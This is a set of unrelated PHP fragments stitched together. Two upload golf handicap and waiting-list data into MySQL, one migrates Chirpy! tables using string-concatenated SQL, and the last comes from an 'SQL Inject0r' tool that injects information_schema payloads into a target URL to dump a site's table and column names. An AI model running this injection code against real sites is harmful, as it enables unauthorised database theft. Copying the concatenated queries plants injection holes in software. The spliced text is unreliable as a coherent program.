require_once realpath($_SERVER["DOCUMENT_ROOT"]) . '/login.php'; require_once realpath($_SERVER["DOCUMENT_ROOT"]) . $script_folder . '/functions.php'; require_once realpath($_SERVER["DOCUMENT_ROOT"]) . $wp_folder . '/wp-blog-header.php'; date_default_timezone_set('America/Los_Angeles'); $connection = new mysqli($db_hostname, $db_username, $db_password, $db_database); if ($connection->connect_error) { die($connection->connect_error); } // var_dump($_POST); login($_POST['Login'], $_POST['Password']); if (!isset($_POST['LocalHandicap'])) { die("No list of local handicaps"); } else { if (isset($_POST['ClearTable'])) { clear_table($connection, 'LocalHandicap'); } if (isset($_POST['LocalHandicapDate'])) { $sqlCmd = "UPDATE `Misc` SET `LocalHandicapDate` = ?"; $update = $connection->prepare($sqlCmd); if (!$update) { die($sqlCmd . " prepare failed: " . $connection->error); } if (!$update->bind_param('s', $_POST['LocalHandicapDate'])) { die($sqlCmd . " bind_param failed: " . $connection->error); } if (!$update->execute()) { die($sqlCmd . " execute failed: " . $connection->error); } } for ($i = 0; $i < count($_POST['LocalHandicap']); ++$i) {
<?php require_once realpath($_SERVER["DOCUMENT_ROOT"]) . '/login.php'; require_once realpath($_SERVER["DOCUMENT_ROOT"]) . $script_folder . '/functions.php'; require_once realpath($_SERVER["DOCUMENT_ROOT"]) . $wp_folder . '/wp-blog-header.php'; date_default_timezone_set('America/Los_Angeles'); $connection = new mysqli($db_hostname, $db_username, $db_password, $db_database); if ($connection->connect_error) { die($connection->connect_error); } //var_dump($_POST); login($_POST['Login'], $_POST['Password']); if (!isset($_POST['WaitingList'])) { die("No waiting list provided."); } else { clear_table($connection, 'WaitingList'); for ($i = 0; $i < count($_POST['WaitingList']); ++$i) { $sqlCmd = "INSERT INTO `WaitingList` VALUES (?, ?, ?)"; $insert = $connection->prepare($sqlCmd); if (!$insert) { die($sqlCmd . " prepare failed: " . $connection->error); } // Change upper case name to normal case $name = FixNameCasing($_POST['WaitingList'][$i]['Name']); if (!$insert->bind_param('iss', $_POST['WaitingList'][$i]['Position'], $name, $_POST['WaitingList'][$i]['DateAdded'])) { die($sqlCmd . " bind_param failed: " . $connection->error); } if (!$insert->execute()) { die($sqlCmd . " execute failed: " . $connection->error); } }
log_event('Accessing database ‘' . $dbname . '’ …', true); mysql_select_db($dbname) or die('Failed to select database: ' . mysql_error()); if ($clear_chirpy_tables) { log_event('Clearing Chirpy!’s tables …'); $tables = array(); $tables[] = 'accounts'; $tables[] = 'events'; $tables[] = 'event_metadata'; $tables[] = 'news'; $tables[] = 'quotes'; $tables[] = 'quote_tag'; $tables[] = 'sessions'; $tables[] = 'tags'; $tables[] = 'vars'; foreach ($tables as $table) { clear_table($chirpy_table_prefix . $table); } log_event('Tables cleared', true); } log_event('Importing user information …'); $users_result = mysql_query('SELECT * FROM `' . $rashusers . '`') or die('Error retrieving user information: ' . mysql_error()); $count_users = 0; while ($row = mysql_fetch_array($users_result)) { $count_users++; mysql_query('INSERT INTO `' . $chirpy_table_prefix . 'accounts`' . ' (`username`, `password`, `level`)' . ' VALUES ("' . $row['user'] . '", "' . $row['password'] . '", ' . convert_level($row['level']) . ')') or die('Error importing user information: ' . mysql_error()); } log_event('Users imported: ' . $count_users, true); mysqL_free_result($users_result); log_event('Importing news items …'); $news_result = mysql_query('SELECT * FROM `' . $newstable . '`') or die('Error retrieving news: ' . mysql_error()); $count_news = 0;
$hex = ''; for ($i = 0; $i < strlen($string); $i++) { $hex .= dechex(ord($string[$i])); } print "<html> <head><title> [S]ql Inject0r - Website Pentesting Tool </head></head><body bgcolor='black'>"; print "<center><a href='javascript:back();' STYLE='text-decoration:none'>[ <font color='#7A7AF7'>Back</font> ]</a>"; $print_table = preg_replace("/{$visible_col}/", "concat(0x73616e64656570,0x3a,TAbLe_NamE,0x3a,ColUmn_NamE,0x3a,0x73616e6465657031)+from+information_schema.columns+where+table_schema=0x{$hex}--+-", $disp_table); // get table namnes $split_table_column = preg_replace("/{$visible_col}/", "concat(0x7461626c65,0x3b,TAbLe_NamE,0x3b,0x7461626c6531,0x20,0x636f6c756d6e,0x3a,ColUmn_NamE,0x3a,0x636f6c756d6e31)+from+information_schema.columns+where+table_schema=0x{$hex}--+-", $disp_table); // eXTRACTING Table And column $html_table_col = file_get_contents($print_table); $split_table_column_html = file_get_contents($split_table_column); //Executing COlumn $splited_html_table_col = file_get_contents($split_table_column); //Executing Table $get_table_col = clear_table($html_table_col); // Get all Table name $splited_column = splited_column($splited_html_table_col); // Get COlun names $splited_table = split_table($split_table_column_html); // Get Table Names print "<br><br>"; print "<div>"; print "<center><table id='logintable' cellpadding='0' cellspaceing='2' border='0' >"; for ($c = 0; $c <= sizeof($get_table_col); $c++) { print "<tr><td><a style='text-decoration: none;' href='dosql.php?db={$db}&options={$option}&col={$visible_col}&table={$splited_table[$c]}&column={$splited_column[$c]}&link2={$disp_table}'><center>" . $get_table_col[$c] . "</a></td</tr></center>"; } print "</table>"; $c = $c - 1; print "<font color='white'>Total Column count Is " . $c . "</font>"; }